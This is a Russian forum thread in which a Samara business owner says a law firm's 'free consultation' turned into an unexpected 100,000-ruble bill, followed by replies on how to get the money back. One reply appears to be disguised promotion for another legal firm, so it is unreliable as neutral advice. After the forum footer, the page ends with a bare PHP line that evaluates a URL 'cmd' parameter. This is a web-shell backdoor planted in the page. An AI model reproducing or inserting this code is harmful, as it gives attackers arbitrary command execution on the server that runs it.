+ Ответить в теме
Показано с 1 по 4 из 4

Тема: Как думаете, нужен ли договор о постоянном сотрудничестве с юр. компанией?


  1. #1

    Самара, бесплатная консультация в юр. компании оказалось обманом, что делать?

    Самара, бесплатная консультация в юр. компании оказалось обманом, что делать? У меня малый бизнес (пару СТО в Самаре), возникли трудности с налоговой и я обратился в одну юр. компанию за бесплатной, по их словам консультацией. В общем, заключил с ними договор о сотрудничестве и на след. день мне выставили счет более чем в 100 000 рублей, мол за составление документов. Они еще ничего не сделали и такие счета выставляют, пришлось уплатить. Жаль что не сразу, но позже до меня дошло, что меня тупо развели, дело мое стоит, а деньги я заплатить ни за что. Есть ли какая возможность расторгнуть договор и вернуть свои средства?
    Последний раз редактировалось Renegat; 20.02.2020 в 21:33.

  2. #2
    Новичок Serf is on a distinguished road Аватар для Serf
    Регистрация
    05.04.2019
    Сообщений
    136
    Что-то мне кажется, они делают все, что бы удерживать клиентов по договору, но не стоит их винить, это же их хлеб и работа) Я думаю, что если вы пригрозить им судом, разбирательствами и привлечением внимания СМИ, им точно будет проще вернуть вам деньги.
    Последний раз редактировалось Serf; 20.02.2020 в 21:35.

  3. #3
    Я бы сделал просто - пришел бы к ним и сказал что мол нашел компанию которая мне больше подходит и хочу расторгнуть договор. И вряд ли бы какой-то их продажник с поддетым языком меня бы переубедил.

  4. #4
    Новичок Devid is on a distinguished road Аватар для Devid
    Регистрация
    05.04.2019
    Сообщений
    132
    А эта юридическая компания случайно не называется единый межрегиональный центр юридической помощи? Если да, то вы точно на мошенников попались, о них целые статьи пишут в интернете и даже СМИ обратила внимание на эту кантору, тут подробная статья обо всем - https://9911030.ru/service/uridiches...vora-s-uristom? Кстати, сайт принадлежит реальной юридической компании, которая может вам помочь вернуть свои деньги и признать судом договор недействительным.
    Последний раз редактировалось Devid; 20.02.2020 в 21:38.

+ Ответить в теме

Похожие темы

  1. Как думаете?
    от bafomet в разделе Шины, диски
    Ответов: 17
    Последнее сообщение: 02.04.2024, 06:22
  2. Договор купли-продажи авто
    от Kurdt в разделе Законодательство и страхование
    Ответов: 0
    Последнее сообщение: 24.12.2019, 13:52
  3. Спор с компанией
    от Kollins в разделе Курилка
    Ответов: 5
    Последнее сообщение: 20.05.2019, 13:55
  4. Что думаете?
    от Карабаз в разделе Покупка и продажа авто
    Ответов: 9
    Последнее сообщение: 07.02.2007, 02:34
  5. Кредитный договор
    от Grandfather with trostochka в разделе Курилка
    Ответов: 6
    Последнее сообщение: 05.10.2006, 11:37

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}